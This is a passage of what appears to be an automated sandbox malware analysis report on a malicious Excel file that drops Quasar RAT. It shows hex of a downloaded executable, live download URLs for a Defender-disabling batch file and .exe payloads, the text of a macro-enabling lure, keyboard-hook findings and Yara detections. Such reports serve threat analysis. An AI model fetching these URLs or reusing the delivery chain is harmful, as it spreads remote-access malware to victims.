cc dd 8d fd ef de c9 d4 49 af a6 50 83 13 2b 0b 7d c7 92 a5 bc 81 aa 4b b3 67 43 ed d4 0e ab 8d 4c c5 1b 17 46 62 b4 cf 94 ea bc 5f 3c 79 08 b9 a4 b6 4b 46 d4 b0 93 61 21 66 e6 e6 4f 5b 5f d9 3f 60 a7 67 76 6c 82 30 87 05 c3 86 9b 46 b3 c6 00 0c b2 9d 28 0f 9d 0b b8 33 5f d2 68 ee 34 a2 37 57 5f e5 22 c7 0d b1 cd fe f9 37 e4 64 cb 8f 6e 44 c5 42 ee 3b 0c e4 7d 91 69 fa 2f 8b 43 1f cf 1e 4f ea 3a b8 5c 9b 53 01 11 37 7d 1e 82 83 67 40 ad f3 46 4a a8 a1 60 36 21 1d 95 50 e9 7e ea a5 2c 08 29 f2 aa a4 67 46 a6 1f 4f 77 ac cb 13 ec 97 d4 9f 72 b5 08 37 79 45 ea 51 d6 e5 aa a5 f9 db d2 be 89 a5 51 ec 41 23 ea 8b c9 21 28 a4 18 4d 1e c0 c7 50 ed 80 ca 85 2e 9a 27 62 5c ea 5c 80 f1 da 53 f7 16 98 68 5c a6 b9 24 15 71 50 89 c9 80 6f 56 17 62 3a 9d 27 da 21 a0 53 6e 91 da 71 c2 3e
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:59:54 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 05 Jan 2021 13:10:58 GMTETag: "53b28b5-db800-5b826effab56e"Accept-Ranges: bytesContent-Length: 899072Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 64 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0d 00 00 14 00 00 00 00 00 00 6e c1 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c1 0d 00 53 00 00 00 00 e0 0d 00 80 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a1 0d 00 00 20 00 00 00 a2 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 11 00 00 00 e0 0d 00 00 12 00 00 00 a4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 b6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c1 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 80 e2 0c 00 98 de 00 00 03 00 00 00 3d 01 00 06 30 11 01 00 50 d1 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 fa 57 44 5e 53 5c 60 f0 ba 5d aa 34 1f 5f fc 78 97 96 76 c7 e2 85 3f 29 30 6f 15 01 38 c6 b1 55 5f 60 b9 df cc dd 8d fd ef de c9 d4 49 af a6 50 83 13 2b 0b 7d c7 92 a5 bc 81 aa 4b b3 67 43 ed d4 0e ab 8d 4c c5 1b 17 46 62 b4 cf 94 ea bc 5f 3c 79 08 b9 a4 b6 4b 46 d4 b0 93 61 21 66 e6 e6 4f 5b 5f d9 3f 60 a7 67 76 6c 82 30 87 05 c3 86 9b 46 b3 c6 00 0c b2 9d 28 0f 9d 0b b8 33 5f d2 68 ee 34 a2 37 57 5f e5 22 c7 0d b1 cd fe f9 37 e4 64 cb 8f 6e 44 c5 42 ee 3b 0c e4 7d 91 69 fa 2f 8b 43 1f cf 1e 4f ea 3a b8 5c 9b 53 01 11 37 7d 1e 82 83 67 40 ad f3 46 4a a8 a1 60 36 21 1d 95 50 e9 7e ea a5 2c 08 29 f2 aa a4 67 46 a6 1f 4f 77 ac cb 13 ec 97 d4 9f 72 b5 08 37 79 45 ea 51 d6 e5 aa a5 f9 db d2 be 89 a5 51 ec 41 23 ea 8b c9 21 28 a4 18 4d 1e c0 c7 50 ed 80 ca 85 2e 9a 27 62 5c ea 5c 80 f1 da 53 f7 16 98 68 5c a6 b9 24 15 71 50 89 c9 80 6f 56 17 62 3a 9d 27 da 21 a0 53 6e 91 da 71 c2 3e
          Source: global trafficHTTP traffic detected: GET /bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe HTTP/1.1Host: gtp.bgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 172.67.8.238 172.67.8.238
          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: SUPERHOSTING_ASBG SUPERHOSTING_ASBG
          Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: global trafficHTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
          Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
          Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
          Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
          Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_00415B0A WSARecv,
          Source: C:\Users\user\AppData\Roaming\sp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
          Source: global trafficHTTP traffic detected: GET /bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe HTTP/1.1Host: gtp.bgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gtp.bgConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: cutt.ly
          Source: powershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: powershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: powershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: powershell.exe, 00000007.00000002.2102819538.0000000000379000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piri
          Source: powershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: sp.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
          Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Installs a global keyboard hookShow sources
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
          Source: C:\Users\user\AppData\Roaming\sp.exeWindows user hook set: 0 mouse low level NULL

          E-Banking Fraud:

          barindex
          Yara detected Quasar RATShow sources
          Source: Yara matchFile source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: dump.pcap, type: PCAPMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
          Source: 00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
          Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
          Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
          Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
          Source: C:\Users\user\Documents\pd.bat, type: DROPPEDMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Document image extraction number: 0Screenshot OCR: document is protected 1. Open the document in Ljivmjt' iS not available for protected documents.
          Source: Document image extraction number: 0Screenshot OCR: protected documents. 2. If this document was downloaded from your email, please click EnUk Editim
          Source: Document image extraction number: 1Screenshot OCR: document is protected 1. Qpen the document in Microsoft Offiu'. Prrvirwing onlinr is not availabk
          Found Excel 4.0 Macro with suspicious formulasShow sources
          Source: spetsifikatsiya.xlsInitial sample: EXEC
          Found obfuscated Excel 4.0 MacroShow sources
          Source: spetsifikatsiya.xlsInitial sample: High usage of CHAR() function: 21
          Powershell drops PE fileShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\sp.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess Stats: CPU usage > 98%
          Source: C:\Users\user\AppData\Roaming\sp.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\sp.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\sp.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\sp.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_005C6B10: new,DeviceIoControl,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E2A38
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E4CD8
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E02D8
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E5AF0
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E6350
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E75F4
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E4CC8
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E3540
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E3500
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E3530
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E37DA
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E63D9
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E37E8
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E5BB0
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_00983657
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_009809A1
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_00980500
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_0098375C
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_006940D0
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_006849A0
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0040EA7D
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_004F2AA7
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0042ABC1
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0068321E
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_00411532
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_004276C4
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_00689D67
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00481811
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00483178
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_0048E138
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00482229
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00488358
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00480470
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00480FC8
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00484000
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00485811
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00485178
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00485188
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00485348
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_0048D308
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00485338
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_0048CBC0
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_0048BCA0
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00484DB9
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_0048F748
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00483FF1
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F631E8
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F6B427
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F6474A
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F625B0
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F625A0
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F63D95
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F63180
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F6B8B9
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F60012
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F65AE0
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F65AD0
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_04142FFB
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F60048
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 35_2_003144A0
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 35_2_003137D0
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 35_2_00313488
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 35_2_00741CD0
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 35_2_00743F5B
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A1810
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001AE138
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A3178
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A2229
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A8358
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A0470
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A0FC8
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A5811
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A4000
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A30EA
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A5178
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A5188
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001AD308
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A5338
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A5348
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A8349
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001ACBC0
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001ABCA0
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A4DB8
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A0F5D
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001AF748
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A3FF1
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003E2090
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003E31E8
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003E474A
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003EB3F9
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003EB427
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003E5C25
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003E0012
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003EB8B9
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003E25B0
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003E25A0
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003E3180
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003E5AE0
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003E5AD0
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_00AC2FFB
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003E0048
          Source: spetsifikatsiya.xlsOLE indicator, VBA macros: true
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\JrekdQ.exe 91F92DAA8C73D6470E92F484CF8CFA68EB3D49AE01170E7A673273E6B854B6F8
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: String function: 006876A0 appears 87 times
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: String function: 006811C5 appears 76 times
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: String function: 006B08FC appears 807 times
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: String function: 00411C35 appears 40 times
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: String function: 00680E81 appears 125 times
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: String function: 006850AE appears 35 times
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: String function: 005CEF10 appears 135 times
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: String function: 00411FB1 appears 172 times
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: String function: 00696B06 appears 45 times
          Source: C:\Users\user\AppData\Roaming\sp.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
          Source: C:\Users\user\AppData\Roaming\sp.exeSection loaded: sfc_os.dll
          Source: C:\Users\user\AppData\Roaming\sp.exeSection loaded: sfc_os.dll
          Source: spetsifikatsiya.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
          Source: dump.pcap, type: PCAPMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
